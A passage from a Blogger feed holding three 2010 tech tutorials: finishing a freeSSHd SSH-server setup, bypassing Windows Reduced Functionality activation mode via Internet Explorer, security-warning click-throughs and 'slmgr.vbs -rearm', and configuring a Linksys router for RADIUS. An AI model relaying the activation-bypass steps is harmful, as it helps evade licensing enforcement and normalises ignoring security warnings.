list.&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/ssh-users-created.gif" alt="ssh-users-created" width="300" height="108" /&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h3 style="font-family: Verdana, Arial, Helvetica, sans-serif; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 16px; font-weight: bold; "&gt;Step 4: Test SSH Access with Putty (Local)&lt;/h3&gt;&lt;p&gt;11- Using the same computer that you install freeSSHd previously, &lt;a title="link to putty download" href="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" target="_blank" style="text-decoration: none; color: rgb(0, 102, 153); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; "&gt;download Putty&lt;/a&gt;. Putty is a desktop command line client that you can use to access SSH servers.&lt;/p&gt;&lt;p&gt;12- Double click the Putty installer to run it. Fill in the details as shown in the diagram below. &lt;a title="read more on 127.0.0.1 / localhost" href="http://en.wikipedia.org/wiki/Localhost" target="_blank" style="text-decoration: none; color: rgb(0, 102, 153); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; "&gt;127.0.0.1&lt;/a&gt; means that you are testing the SSH access from a local connection.&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/test-ssh-with-putty.gif" alt="test-ssh-with-putty" width="350" height="332" /&gt;&lt;/p&gt;&lt;p&gt;13- Press “Yes” on the security alert screen. Insert your SSH username and password that you have created previously.&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/accept-sha-key-putty.gif" alt="accept-sha-key-putty" width="400" height="247" /&gt;&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/test-ssh-with-putty-2.gif" alt="test-ssh-with-putty-2" width="300" height="122" /&gt;&lt;/p&gt;&lt;p&gt;14- If you get a Windows command prompt, you have successfully access your SSH server! Congratulations!&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/test-ssh-with-putty-3.gif" alt="test-ssh-with-putty-3" width="300" height="126" /&gt;&lt;/p&gt;&lt;p&gt;15- Connect your computer to the Internet / local network and take note of your computer’s IP address.&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h3 style="font-family: Verdana, Arial, Helvetica, sans-serif; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 16px; font-weight: bold; "&gt;Step 5: Test SSH Access with Putty (Remote)&lt;/h3&gt;&lt;p&gt;16- Using another computer e.g. your office computer, download Putty again.&lt;/p&gt;&lt;p&gt;17- Repeat step 12 to 13 above but this time, use your SSH server IP address (type it inside Host Name or IP Address field).&lt;/p&gt;&lt;p&gt;18- If you get a Windows command prompt, you have successfully access your SSH server from a remote computer! Double congrats to you!&lt;/p&gt;&lt;p&gt;&lt;img src="http://www.techmalaya.com/blog/wp-content/uploads/2009/08/test-ssh-with-putty-4.gif" alt="test-ssh-with-putty-4" width="400" height="227" /&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;There you go, a &lt;strong&gt;complete noob guide to setup a SSH server in Windows&lt;/strong&gt;, using the super simple freeSSHd application. Be geeky and try it today!&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-6225402349134889383?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/6225402349134889383/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-setup-ssh-server-in-windows-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/6225402349134889383'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/6225402349134889383'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/how-to-setup-ssh-server-in-windows-with.html' title='How to Setup SSH Server in Windows with freeSSHd'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-3499133188538477369</id><published>2010-02-05T22:52:00.000-08:00</published><updated>2010-02-05T22:53:06.905-08:00</updated><title type='text'>Bypass Windows Vistas and Windows 7’s Reduced Functionality Mode and Get Your Data</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: verdana, arial, sans-serif; font-size: 10px; color: rgb(68, 68, 68); "&gt;&lt;p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 11px; line-height: 16px; color: rgb(68, 68, 68); "&gt;So you use Windows 7 or Vista and you have encountered the now famous “Reduced Functionality Mode.” You can either throw up your arms and cry or bypass it and get to your data.&lt;/p&gt;&lt;p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 11px; line-height: 16px; color: rgb(68, 68, 68); "&gt;&lt;/p&gt;&lt;center style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;img src="http://uneasysilence.com/media/2009/11/WindowsActivation.jpg" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 3px; padding-right: 3px; padding-bottom: 3px; padding-left: 3px; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-bottom-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); background-position: initial initial; " /&gt;&lt;/center&gt;&lt;p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 11px; line-height: 16px; color: rgb(68, 68, 68); "&gt;&lt;/p&gt;&lt;p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 11px; line-height: 16px; color: rgb(68, 68, 68); "&gt;Here is how to temporarily remove the “Reduced Functionality” mode and resture your computer back to a (semi) normal state.&lt;/p&gt;&lt;ul style="margin-top: 1em; margin-right: 2em; margin-bottom: 1em; margin-left: 2em; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; list-style-type: none; list-style-position: initial; list-style-image: initial; font-size: 11px; line-height: 16px; "&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;On the Windows Activation, click on Access your computer with reduced functionality option.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;Once the Internet Explorer loads, click on File on menu bar and then select Open on the pull-down menu.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;On the Open dialog window, type in C:\Windows\Explorer.exe and then click OK.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;Click OK button on “IE needs to open a new window to open this webpage” confirmation prompt.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;Click Run button on “File Download – Security Warning” dialog prompt.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;Click on Run button on “File Download – Security Warning” warning dialog related to unknown and not verified publisher.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;User shell will load, and the desktop, taskbar, start menu and etc will be restored.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;The computer has recovered from Reduced Functionality for this session. To permanently stop RFM to happen again, Windows has to be rearmed.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;Click on the Windows Start button.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;Type Cmd in Start Search box.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;A program shortcut will show up in the Start panel search results. Right click on the shortcut and select Run as Administrator.&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;In the Command Prompt window, type in the following command and then hit Enter: &lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;slmgr.vbs -rearm&lt;/strong&gt;&lt;/li&gt;&lt;li style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 21px; background-image: url(http://uneasysilence.com/wp-content/themes/UNEASYjanuary/images/li.gif); background-repeat: no-repeat; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-color: initial; color: rgb(108, 108, 108); background-position: 0px 0px; "&gt;Restart your computer.&lt;/li&gt;&lt;/ul&gt;&lt;p style="margin-top: 1em; margin-right: 0px; margin-bottom: 1em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-size: 11px; line-height: 16px; color: rgb(68, 68, 68); "&gt;Now obviously something must have went awry for that dialog box to pop up, any I think it would be recommended that you reinstall Windows after you backup all your data.&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-3499133188538477369?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/3499133188538477369/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/bypass-windows-vistas-and-windows-7s.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3499133188538477369'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/3499133188538477369'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/bypass-windows-vistas-and-windows-7s.html' title='Bypass Windows Vistas and Windows 7’s Reduced Functionality Mode and Get Your Data'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-8025505277182811</id><published>2010-02-05T22:47:00.000-08:00</published><updated>2010-02-05T22:48:29.546-08:00</updated><title type='text'>Setup Linksys Router With Radius Server Authentication</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: Verdana, Helvetica, sans-serif; font-size: 14px; color: rgb(51, 51, 51); line-height: 18px; "&gt;&lt;h3 style="font-family: Lucida, Times, serif; color: rgb(30, 71, 114); font-size: 18px; margin-top: 5px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Configuring The Linksys Router&lt;/h3&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;login to your Linksys router and on the &lt;strong&gt;Setup &lt;/strong&gt;tab make sure you set the following configurations:&lt;/p&gt;&lt;ol&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Internet Connection type : &lt;strong&gt;Automatic Configuration – DHCP&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Router Name: &lt;strong&gt;anything&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Host Name : &lt;strong&gt;anything&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Domain Name : &lt;strong&gt;anything&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;MTU : &lt;strong&gt;Auto&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Local IP Address: &lt;strong&gt;Enter an IP address from your network here&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;DHCP Server : &lt;strong&gt;Disable&lt;/strong&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;a href="http://forevergeeks.com/wp-content/uploads/2009/03/image.png" style="text-decoration: underline; color: rgb(20, 110, 180); "&gt;&lt;img title="Linksys Router setup tab" border="0" alt="Linksys Router setup tab" src="http://forevergeeks.com/wp-content/uploads/2009/03/image-thumb.png" width="504" height="320" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; max-width: 100%; border-width: initial; border-color: initial; border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; " /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;Click on Save Settings after making the changes.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;em&gt;&lt;strong&gt;note&lt;/strong&gt;.&lt;/em&gt; &lt;em&gt;&lt;span style="font-size: xx-small; "&gt;your settings could be different, but just make sure you enter a local network IP address for local IP, and disable DHCP server. otherwise your router won’t work.. also don’t forget to plug-in the Ethernet cable on the router on one of the LAN ports, not the WAN port, otherwise you won’t be able to connect using the new IP address.&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;now, click on the &lt;strong&gt;Wireless &lt;/strong&gt;tab, and set the following settings:&lt;/p&gt;&lt;ul&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Wireless Network Mode : &lt;strong&gt;Mixed&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;Wireless Network Name (SSID): &lt;strong&gt;type your chosen SSID here&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;Wireless Channel: &lt;strong&gt;Leave the default if you want, otherwise change it to something else.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;Wireless SSID Broadcast&lt;strong&gt; : &lt;/strong&gt;&lt;strong&gt;Enable &lt;/strong&gt;Click on the &lt;strong&gt;Save Settings &lt;/strong&gt;after making the changes.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;span style="font-size: x-small; "&gt;&lt;/span&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;/p&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt;&lt;span style="font-size: x-small; "&gt; &lt;span style="font-size: x-small; "&gt;&lt;a href="http://forevergeeks.com/wp-content/uploads/2009/03/image1.png" style="text-decoration: underline; color: rgb(20, 110, 180); "&gt;&lt;img title="wireless network" border="0" alt="wireless network" src="http://forevergeeks.com/wp-content/uploads/2009/03/image-thumb1.png" width="504" height="289" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; max-width: 100%; border-width: initial; border-color: initial; border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; margin-left: 0px; border-left-width: 0px; margin-right: 0px; " /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;Now click on the &lt;strong&gt;Wireless Security &lt;/strong&gt;option. and make sure you have the following settings:&lt;/p&gt;&lt;ol&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Security Mode : &lt;strong&gt;WPA Enterprise&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;WPA Algorithms&lt;strong&gt; : TKIP&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;RADIUS Server Address: &lt;strong&gt;enter the IP address of your radius server here&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;RADIUS Port: &lt;strong&gt;Leave the 1812 port there&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Shared-key : &lt;strong&gt;enter your shared key here.&lt;/strong&gt;&lt;/li&gt;&lt;li style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); margin-bottom: 5px; "&gt;Key Renewal Timeout:&lt;strong&gt; leave the default value &lt;/strong&gt;(3600 seconds)&lt;/li&gt;&lt;/ol&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;a href="http://forevergeeks.com/wp-content/uploads/2009/03/image2.png" style="text-decoration: underline; color: rgb(20, 110, 180); "&gt;&lt;img title="Wireless Security" border="0" alt="Wireless Security" src="http://forevergeeks.com/wp-content/uploads/2009/03/image-thumb2.png" width="504" height="311" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; max-width: 100%; border-width: initial; border-color: initial; border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; " /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;click on the &lt;strong&gt;Save Settings &lt;/strong&gt;button after you finish changing the settings.&lt;/p&gt;&lt;h3 style="font-family: Lucida, Times, serif; color: rgb(30, 71, 114); font-size: 18px; margin-top: 5px; margin-right: 0px; margin-bottom: 5px; margin-left: 0px; "&gt;Configuring The Radius Server&lt;/h3&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;now, that we have setup the Linksys router, we need to configure the Internet Authentication service to talk back to the Linksys router.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;On your Windows Server, go to &lt;strong&gt;Administrative Tools &lt;/strong&gt;and open the &lt;strong&gt;Internet Authentication Service &lt;/strong&gt;and select the &lt;strong&gt;Radius Clients &lt;/strong&gt;folder on the left panel:&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;a href="http://forevergeeks.com/wp-content/uploads/2009/03/image3.png" style="text-decoration: underline; color: rgb(20, 110, 180); "&gt;&lt;img title="radius clients" border="0" alt="radius clients" src="http://forevergeeks.com/wp-content/uploads/2009/03/image-thumb3.png" width="289" height="230" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; max-width: 100%; border-width: initial; border-color: initial; border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; " /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;then right-click on an empty area on the right panel, and select &lt;strong&gt;New Radius Client&lt;/strong&gt;:&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;a href="http://forevergeeks.com/wp-content/uploads/2009/03/image4.png" style="text-decoration: underline; color: rgb(20, 110, 180); "&gt;&lt;img title="new radius client" border="0" alt="new radius client" src="http://forevergeeks.com/wp-content/uploads/2009/03/image-thumb4.png" width="164" height="216" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; max-width: 100%; border-width: initial; border-color: initial; border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; " /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;as &lt;strong&gt;Friendly name&lt;/strong&gt; type something easy to identify for you, and for &lt;strong&gt;Client Address ( IP DNS ) &lt;/strong&gt;type the IP address of the Linksys router.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;a href="http://forevergeeks.com/wp-content/uploads/2009/03/image5.png" style="text-decoration: underline; color: rgb(20, 110, 180); "&gt;&lt;img title="New radius server" border="0" alt="New radius server" src="http://forevergeeks.com/wp-content/uploads/2009/03/image-thumb5.png" width="504" height="388" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; max-width: 100%; border-width: initial; border-color: initial; border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; " /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;click on &lt;strong&gt;Next.&lt;/strong&gt;&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;on the next screen, select &lt;strong&gt;Radius Standard &lt;/strong&gt;on the &lt;strong&gt;Client-Vendor &lt;/strong&gt;option. enter the &lt;strong&gt;Shared secret &lt;/strong&gt;key. this key is the shared key we entered on the Linksys router wireless security window . make sure the option &lt;strong&gt;Request must contain the message authentication attribute &lt;/strong&gt;is unchecked.&lt;/p&gt;&lt;p style="font-family: Verdana, Arial, sans-serif; color: rgb(0, 0, 0); "&gt;&lt;a href="http://forevergeeks.com/wp-content/uploads/2009/03/image6.png" style="text-decoration: underline; color: rgb(20, 110, 180); "&gt;&lt;img title="radius server standard" border="0" alt="radius server standard" src="http://forevergeeks.com/wp-content/uploads/2009/03/image-thumb6.png" width="504" height="386" style="border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; max-width: 100%; border-width: initial; border-color: initial; border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; " 